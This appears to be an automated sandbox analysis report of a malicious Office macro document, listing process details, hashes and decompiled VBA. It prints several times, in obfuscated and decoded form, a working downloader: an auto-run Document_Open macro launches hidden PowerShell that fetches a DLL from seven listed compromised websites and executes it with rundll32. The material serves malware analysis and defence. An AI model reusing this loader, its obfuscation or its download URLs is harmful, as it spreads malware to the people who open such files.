    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Start time:10:54:21
    Start date:22/11/2021
    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Wow64 process (32bit):false
    Commandline:powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
    Imagebase:0x13f580000
    File size:473600 bytes
    MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:.Net C# or VB.NET
    Reputation:high

    Disassembly

    Code Analysis

    Call Graph

    Graph

    Module: bvkaeiku2ncoi2uho3ihdes

    Declaration
    Line | Content
    1 | Attribute VB_Name = "bvkaeiku2ncoi2uho3ihdes"
    2 | Attribute VB_Base = "1Normal.ThisDocument"
    3 | Attribute VB_GlobalNameSpace = False
    4 | Attribute VB_Creatable = False
    5 | Attribute VB_PredeclaredId = True
    6 | Attribute VB_Exposed = True
    7 | Attribute VB_TemplateDerived = True
    8 | Attribute VB_Customizable = True

    Executed Functions
    APIs | Meta Information
    CreateObject | CreateObject("Wscript.Shell")
    Replace | Replace("DaIcDaImd.DaIeDaIxe DaI/DaIc sDaItaDaIrt /DaIB poDaIwDaIerDaIshDaIelDaIl $dDaIfkj="$DaIstDaIrs=\"hDaItDaItp:DaI/DaI/thepilaDaItesstudionj.cDaIom/DaIwp-contDaIent/oAx5UoQmIX3cbw/,hDaItDaItp:DaI/DaI/alfaoDaIfarms.coDaIm/xcyav/F9le301G89W0s2g4jLO5/,htDaItpDaIs:DaI/DaI/stDaIaviancjs.cDaIom/wpDaI-foDaIrum/QOm4n2/,DaIhtDaItpDaIs:DaI/DaI/yougaDaIndan.cDaIom/bacDaIkup_YDaIouGaDaIndan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,htDaItDaIp:DaI/DaI/alfadaDaIndoinc.cDaIom/67oyp/C2J2KyCpQnkK4Um/,hDaItDaItp:DaI/DaI/wDaIwDaIw.caboDaIturnup.cDaIom/wDaIp-contDaIent/pluDaIgins/clDaIassic-edDaIitor/js/PZgllRH6QtkaCKtSB50rzr/,htDaItDaIp:/DaI/iDaItoDaImsysDaItem.iDaIn/i9eg3y/nNxmmn9aTcv/\".SDaIplDaIit(\"DaI,DaI\");fDaIoDaIreacDaIh($DaIst iDaIn $DaIstrDaIs){DaI$r1=GDaIet-RDaIandDaIom;$DaIr2=GDaIeDaIt-RDaIandDaIom;DaI$tpDaIth=\"DaICDaI:DaI\PDaIroDaIgramDDaIata\\\"+DaI$rDaI1+\".DaIdDaIll\"DaI;IDaInDaIvoDaIke-WDaIebDaIReDaIqueDaIst -DaIUrDaIi $sDaIt -ODaIutFDaIilDaIe $tptDaIh;iDaIf(TDaIeDaIst-DaIPatDaIh DaI$tpDaIth){$DaIfDaIp=DaI\"DaIC:DaI\DaIWiDaIndDaIowDaIs\SDaIysDaIWDaIow6DaI4\rDaIuDaIndlDaIl3DaI2.eDaIxDaIe\";$DaIa=DaI$tDaIptDaIh+DaI\",DaIf\"+DaI$DaIr2;SDaItDaIaDaIrt-DaIProcDaIess $fDaIp -DaIArgDaIumeDaIntLDaIist DaI$aDaI;bDaIrDaIeak;}};";DaIIEXDaI $dDaIfkj","DaI","") -> cmd.exe /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
    Run | IWshShell3.Run("cmd.exe /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj",0) -> 0

    Strings | Decrypted Strings
    "DaIcDaImd.DaIeDaIxe DaI/DaIc sDaItaDaIrt /DaIB poDaIwDaIerDaIshDaIelDaIl $dDaIfkj=""$DaIstDaIrs=\""hDaItDaItp:DaI/DaI/thepilaDaItesstudionj.cDaIom/DaIwp-contDaIent/oAx5UoQmIX3cbw/,hDaItDaItp:DaI/DaI/alfaoDaIfarms.coDaIm/xcyav/F9le301G89W0s2g4jLO5/,htDaItpDaIs:DaI/DaI/stDaIaviancjs.cDaIom/wpDaI-foDaIrum/QOm4n2/,DaIhtDaItpDaIs:DaI/DaI/yougaDaIndan.cDaIom/bacDaIkup_YDaIouGaDaIndan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,htDaItDaIp:DaI/DaI/alfadaDaIndoinc.cDaIom/67oyp/C2J2KyCpQnkK4Um/,hDaItDaItp:DaI/DaI/wDaIwDaIw.caboDaIturnup.cDaIom/wDaIp-contDaIent/pluDaIgins/clDaIassic-edDaIitor/js/PZgllRH6QtkaCKtSB50rzr/,htDaItDaIp:/DaI/iDaItoDaImsysDaItem.iDaIn/i9eg3y/nNxmmn9aTcv/\"".SDaIplDaIit(\""DaI,DaI\"");fDaIoDaIreacDaIh($DaIst iDaIn "
    "Wsc"
    """"
    "DaI"
    """"
    "DaI"
    Line | Instruction | Meta Information
    53 | Sub dgfjalfhkaugwikgfuol3wgnacoi3u5taboi3ut5roai3u5go3wugaolisdrgfso8i7wejwdoljgf(nfkl34 as String, ndr54 as Long, bvret as Long) |
    54 | Dim s1, s2, ra, glew, hkqwfsadesf, st as String | executed
    55 | Dim d, R as Double |
    56 | s2 = "DaIcDaImd.DaIeDaIxe DaI/DaIc sDaItaDaIrt /DaIB poDaIwDaIerDaIshDaIelDaIl $dDaIfkj=""$DaIstDaIrs=\""hDaItDaItp:DaI/DaI/thepilaDaItesstudionj.cDaIom/DaIwp-contDaIent/oAx5UoQmIX3cbw/,hDaItDaItp:DaI/DaI/alfaoDaIfarms.coDaIm/xcyav/F9le301G89W0s2g4jLO5/,htDaItpDaIs:DaI/DaI/stDaIaviancjs.cDaIom/wpDaI-foDaIrum/QOm4n2/,DaIhtDaItpDaIs:DaI/DaI/yougaDaIndan.cDaIom/bacDaIkup_YDaIouGaDaIndan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,htDaItDaIp:DaI/DaI/alfadaDaIndoinc.cDaIom/67oyp/C2J2KyCpQnkK4Um/,hDaItDaItp:DaI/DaI/wDaIwDaIw.caboDaIturnup.cDaIom/wDaIp-contDaIent/pluDaIgins/clDaIassic-edDaIitor/js/PZgllRH6QtkaCKtSB50rzr/,htDaItDaIp:/DaI/iDaItoDaImsysDaItem.iDaIn/i9eg3y/nNxmmn9aTcv/\"".SDaIplDaIit(\""DaI,DaI\"");fDaIoDaIreacDaIh($DaIst iDaIn " |
    57 | Dim fs as Integer |
    58 | Set service = CreateObject("Wsc" + s1 + "ript.She" & "ll") | CreateObject("Wscript.Shell"); executed
    59 | s2 = s2 + "$DaIstrDaIs){DaI$r1=GDaIet-RDaIandDaIom;$DaIr2=GDaIeDaIt-RDaIandDaIom;DaI$tpDaIth=\""DaICDaI:DaI\PDaIroDaIgramDDaIata\\\""+DaI$rDaI1+\"".DaIdDaIll\""DaI;IDaInDaIvoDaIke-WDaIebDaIReDaIqueDaIst -DaIUrDaIi $sDaIt -ODaIutFDaIilDaIe $tptDaIh;iDaIf(TDaIeDaIst-DaIPatDaIh DaI$tpDaIth){$DaIfDaIp=DaI\""DaIC:DaI\DaIWiDaIndDaIowDaIs\SDaIysDaIWDaIow6DaI4\rDaIuDaIndlDaIl3DaI2.eDaIxDaIe\"";$DaIa=DaI$tDaIptDaIh+DaI\"",DaIf\""+DaI$DaIr2;SDaItDaIaDaIrt-DaIProcDaIess $fDaIp -DaIArgDaIumeDaIntLDaIist DaI$aDaI;bDaIrDaIeak;}};"";DaIIEXDaI $dDaIfkj" |
    60 | If d <> 0.123456 Then |
    61 | ra = Replace(s2, "DaI", "") | Replace("DaIcDaImd.DaIeDaIxe DaI/DaIc sDaItaDaIrt /DaIB poDaIwDaIerDaIshDaIelDaIl $dDaIfkj="$DaIstDaIrs=\"hDaItDaItp:DaI/DaI/thepilaDaItesstudionj.cDaIom/DaIwp-contDaIent/oAx5UoQmIX3cbw/,hDaItDaItp:DaI/DaI/alfaoDaIfarms.coDaIm/xcyav/F9le301G89W0s2g4jLO5/,htDaItpDaIs:DaI/DaI/stDaIaviancjs.cDaIom/wpDaI-foDaIrum/QOm4n2/,DaIhtDaItpDaIs:DaI/DaI/yougaDaIndan.cDaIom/bacDaIkup_YDaIouGaDaIndan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,htDaItDaIp:DaI/DaI/alfadaDaIndoinc.cDaIom/67oyp/C2J2KyCpQnkK4Um/,hDaItDaItp:DaI/DaI/wDaIwDaIw.caboDaIturnup.cDaIom/wDaIp-contDaIent/pluDaIgins/clDaIassic-edDaIitor/js/PZgllRH6QtkaCKtSB50rzr/,htDaItDaIp:/DaI/iDaItoDaImsysDaItem.iDaIn/i9eg3y/nNxmmn9aTcv/\".SDaIplDaIit(\"DaI,DaI\");fDaIoDaIreacDaIh($DaIst iDaIn $DaIstrDaIs){DaI$r1=GDaIet-RDaIandDaIom;$DaIr2=GDaIeDaIt-RDaIandDaIom;DaI$tpDaIth=\"DaICDaI:DaI\PDaIroDaIgramDDaIata\\\"+DaI$rDaI1+\".DaIdDaIll\"DaI;IDaInDaIvoDaIke-WDaIebDaIReDaIqueDaIst -DaIUrDaIi $sDaIt -ODaIutFDaIilDaIe $tptDaIh;iDaIf(TDaIeDaIst-DaIPatDaIh DaI$tpDaIth){$DaIfDaIp=DaI\"DaIC:DaI\DaIWiDaIndDaIowDaIs\SDaIysDaIWDaIow6DaI4\rDaIuDaIndlDaIl3DaI2.eDaIxDaIe\";$DaIa=DaI$tDaIptDaIh+DaI\",DaIf\"+DaI$DaIr2;SDaItDaIaDaIrt-DaIProcDaIess $fDaIp -DaIArgDaIumeDaIntLDaIist DaI$aDaI;bDaIrDaIeak;}};";DaIIEXDaI $dDaIfkj","DaI","") -> cmd.exe /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj; executed
    62 | Endif |
    63 | service.Run ra, 0 | IWshShell3.Run("cmd.exe /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj",0) -> 0; executed
    64 | End Sub |

    APIs | Meta Information
    Part of subcall function dgfjalfhkaugwikgfuol3wgnacoi3u5taboi3ut5roai3u5go3wugaolisdrgfso8i7wejwdoljgf@bvkaeiku2ncoi2uho3ihdes: CreateObject
    Part of subcall function dgfjalfhkaugwikgfuol3wgnacoi3u5taboi3ut5roai3u5go3wugaolisdrgfso8i7wejwdoljgf@bvkaeiku2ncoi2uho3ihdes: Replace
    Part of subcall function dgfjalfhkaugwikgfuol3wgnacoi3u5taboi3ut5roai3u5go3wugaolisdrgfso8i7wejwdoljgf@bvkaeiku2ncoi2uho3ihdes: Run
    fojn
    MsgBox

    Strings | Decrypted Strings
    "sd"
    "afqowihro3ihoqew df"
    "gks; kr4;"
    "gks; kr4;"
    Line | Instruction | Meta Information
    70 | Private Sub Document_Open() |
    71 | Dim dfjrqlwihjpqwof as String | executed
    72 | dgfjalfhkaugwikgfuol3wgnacoi3u5taboi3ut5roai3u5go3wugaolisdrgfso8i7wejwdoljgf "sd", 0, 0 |
    73 | If fojn = "afqowihro3ihoqew df" Then | fojn
    74 | fjl = "gks; kr4;" |
    75 | MsgBox fjl | MsgBox
    76 | Endif |
    77 | End Sub |

    Non-Executed Functions
    APIs | Meta Information
    Clear
    GetFolder
    MsgBox
    vbCritical
    GetFolder
    MsgBox
    vbCritical
    FilenamesCollection
    Count
    MsgBox
    vbNewLine
    vbExclamation
    ProgressIndicator
    Show
    StartNewAction
    Count
    ScreenUpdating
    SubAction
    Dir
    Log
    Dir
    Open
    Log
    vbTab
    Worksheets
    Range
    End
    xlUp
    Resize
    Rows
    Transpose
    Value
    Close
    DoEvents
    Log
    vbTab
    Dir
    vbNormal
    Hide
    DoEvents
    ScreenUpdating
    MsgBox
    vbInformation

    Strings | Decrypted Strings
    "(look)"
    """"
    """"
    ","
    """"
    ","
    ","
    "?????? ?*??*.xls*"
    """"
    """"
    """"
    "$index $count"
    "$time"
    ":"
    "a"
    "b"
    "b1"
    "$index $count"
    "$time"
    ":"
    ":"
    "b"
    "b1"
    "a"
    """"
    Line | Instruction | Meta Information
    9 | Sub tgkauegriu3gkaiusdgfaig3eirgaoiw3rgfoaisdgefig() |
    10 | On Error Resume Next |
    10 | Err.Clear | Clear
    11 | InvoiceFolder$ = GetFolder(1, , "(look)") | GetFolder
    12 | If InvoiceFolder$ = "" Then |
    12 | MsgBox "", vbCritical, "" | MsgBox, vbCritical
    12 | Exit Sub |
    12 | Endif |
    13 | ArchieveFolder$ = GetFolder(2, , ",") | GetFolder
    14 | If ArchieveFolder$ = "" Then |
    14 | MsgBox ",", vbCritical, "," | MsgBox, vbCritical
    14 | Exit Sub |
    14 | Endif |
    15 | Dim coll as Collection |
    16 | Set coll = FilenamesCollection(InvoiceFolder$, "?????? ?*??*.xls*", 1) | FilenamesCollection
    17 | If coll.Count = 0 Then | Count
    18 | MsgBox "" & vbNewLine & InvoiceFolder$, vbExclamation, "" | MsgBox, vbNewLine, vbExclamation
    19 | Exit Sub |
    20 | Endif |
    21 | Dim pi as New ProgressIndicator | ProgressIndicator
    21 | pi.Show "", , 2 | Show
    22 | pi.StartNewAction , , , , , coll.Count | StartNewAction, Count
    23 | Dim WB as Workbook, sh as Worksheet, ra as Range |
    24 | Application.ScreenUpdating = False | ScreenUpdating
    25 | For Each FileName in coll |
    26 | pi.SubAction "$index $count", ":" & Dir(FileName), "$time" | SubAction, Dir
    27 | pi.Log ":" & Dir(FileName) | Log, Dir
    28 | Set WB = Nothing |
    28 | Set WB = Workbooks.Open(FileName, False, True) | Open
    29 | If WB Is Nothing Then |
    30 | pi.Log vbTab & "." | Log, vbTab
    31 | Else |
    32 | Set sh = WB.Worksheets(1) | Worksheets
    33 | Set ra = sh.Range(sh.Range("b1"), sh.Range("b" & sh.Rows.Count).End(xlUp)) | Range, End, xlUp
    34 | shb.Range("a" & shb.Rows.Count).End(xlUp).Offset(1).Resize( , ra.Rows.Count).Value = Application.WorksheetFunction.Transpose(ra.Value) | Resize, Rows, Transpose, Value
    36 | WB.Close False | Close
    36 | DoEvents | DoEvents
    37 | pi.Log vbTab & "." | Log, vbTab
    38 | Name FileName As ArchieveFolder$ & Dir(FileName, vbNormal) | Dir, vbNormal
    39 | Endif |
    40 | Next |
    41 | pi.Hide | Hide
    41 | DoEvents | DoEvents
    41 | Application.ScreenUpdating = True | ScreenUpdating
    42 | MsgBox "", vbInformation | MsgBox, vbInformation
    43 | End Sub |

    APIs | Meta Information
    Clear
    IIf
    Len
    PROJECT_NAME$
    GetSetting
    Name
    Application
    Len
    Dir
    vbDirectory
    Len
    Dir
    vbDirectory
    Path
    ThisWorkbook
    Title
    Right$
    SaveSetting
    Name
    Application

    Strings | Decrypted Strings
    ","
    """"
    "folder"
    """"
    """"
    """"
    """"
    """"
    "\"
    "folder"
    Line | Instruction | Meta Information
    81 | Function bcbcmbvbvch3h2yg3u5i4tyirugiu(optional ByVal FolderIndex& = 0, optional ByVal ShowDialog as Boolean = False, optional ByVal Title$ = "", optional ByVal InitialFolder$) as String |
    82 | On Error Resume Next |
    82 | Err.Clear | Clear
    83 | ProjectName$ = IIf(Len(PROJECT_NAME$) > 0, PROJECT_NAME$, ",") | IIf, Len, PROJECT_NAME$
    84 | PreviousFolder$ = GetSetting(Application.Name, ProjectName$, "folder" & FolderIndex&, "") | GetSetting, Name, Application
    85 | If Len(PreviousFolder$) > 0 And Not ShowDialog Then | Len
    86 | If Dir(PreviousFolder$, vbDirectory) <> "" Then | Dir, vbDirectory
    86 | GetFolder = PreviousFolder$ |
    86 | Exit Function |
    86 | Endif |
    87 | Endif |
    88 | If InitialFolder$ = "" Then |
    89 | If Len(PreviousFolder$) > 0 And Dir(PreviousFolder$, vbDirectory) <> "" Then | Len, Dir, vbDirectory
    90 | InitialFolder$ = PreviousFolder$ |
    91 | Else |
    92 | InitialFolder$ = ThisWorkbook.Path & "\" | Path, ThisWorkbook
    93 | Endif |
    94 | Endif |
    95 | With Application.FileDialog(msoFileDialogFolderPicker) |
    96 | . ButtonName = "" |
    96 | . Title = Title | Title
    96 | . InitialFileName = InitialFolder$ |
    97 | If . Show <> - 1 Then |
    97 | Exit Function |
    97 | Endif |
    98 | GetFolder = . SelectedItems(1) |
    99 | If Not Right$(GetFolder, 1) = "\" Then | Right$
    99 | GetFolder = GetFolder & "\" |
    99 | Endif |
    100 | SaveSetting Application.Name, ProjectName$, "folder" & FolderIndex&, GetFolder | SaveSetting, Name, Application
    101 | End With |
    102 | End Function |

    APIs | Meta Information
    Clear
    GetFolder
    GetFolder
    GetFolder

    Strings | Decrypted Strings
    """"
    """"
    """"
    """"
    """"
    Line | Instruction | Meta Information
    44 | Sub gdekkefh32yeyf8tasf8gqw8dgfiaxdbaflpo3pt23hf() |
    45 | On Error Resume Next |
    45 | Err.Clear | Clear
    46 | folder_1$ = GetFolder(1, , "") | GetFolder
    47 | If folder_1$ = "" Then |
    47 | Exit Sub |
    47 | Endif |
    48 | folder_2$ = GetFolder(2, , , folder_1$) | GetFolder
    49 | If folder_2$ = "" Then |
    49 | Exit Sub |
    49 | Endif |
    50 | folder_3$ = GetFolder( , True, "") | GetFolder
    51 | If folder_3$ = "" Then |
    51 | Exit Sub |
    51 | Endif |
    52 | End Sub |

    APIs (Meta Information): GetFolder, MsgBox, vbInformation
    Strings (Decrypted Strings): "", ":"

    Line  Instruction   (Meta Information)
    65   Sub fhowi34hotaildovgjuspozao3ethao4wthihegf()
    66   folder$ = GetFolder()   (GetFolder)
    67   If folder$ = "" Then
    67   Exit Sub
    67   End If
    68   MsgBox ":" & folder$, vbInformation   (MsgBox, vbInformation)
    69   End Sub

    APIs (Meta Information): GetFolder

    Line  Instruction   (Meta Information)
    78   Sub dgfhoswihetaoihegaosoaihcbi()
    79   On Error Resume Next
    79   GetFolder , True   (GetFolder)
    80   End Sub


      Executed Functions

      Memory Dump Source
      • Source File: 00000004.00000002.432859061.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_7ff00270000_powershell.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 3a73973a3205e80d0ad2d572ae4da845bcd68694cc9c7b114c1f406103f6f613
      • Instruction ID: 7f645f0a0bb4d83ccdea21c757fac5b039009eaaed9af91e9a1267d2911fccde
      • Opcode Fuzzy Hash: 3a73973a3205e80d0ad2d572ae4da845bcd68694cc9c7b114c1f406103f6f613
      • Instruction Fuzzy Hash: 2C11996144E3C68FD3038B789C256953FB1AF43214B1A01D7D8C8CF0B3E25D4A9AC762
      Uniqueness

      Uniqueness Score: -1.00%

      Non-executed Functions

      Memory Dump Source
      • Source File: 00000004.00000002.432859061.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_7ff00270000_powershell.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: b69bbaaf4692e46fd409352025d5c205e2b04360ada7efc9d6380c0efc575df3
      • Instruction ID: 3602658769e024f799cd1c6d9b470e71be684e262397f8f78d31c4e772cc6c4c
      • Opcode Fuzzy Hash: b69bbaaf4692e46fd409352025d5c205e2b04360ada7efc9d6380c0efc575df3
      • Instruction Fuzzy Hash: 77017A6655E7D58FD70387749C68A903FB0AF53210F0A06DBD084CF0E3E2585A5AD362
      Uniqueness

      Uniqueness Score: -1.00%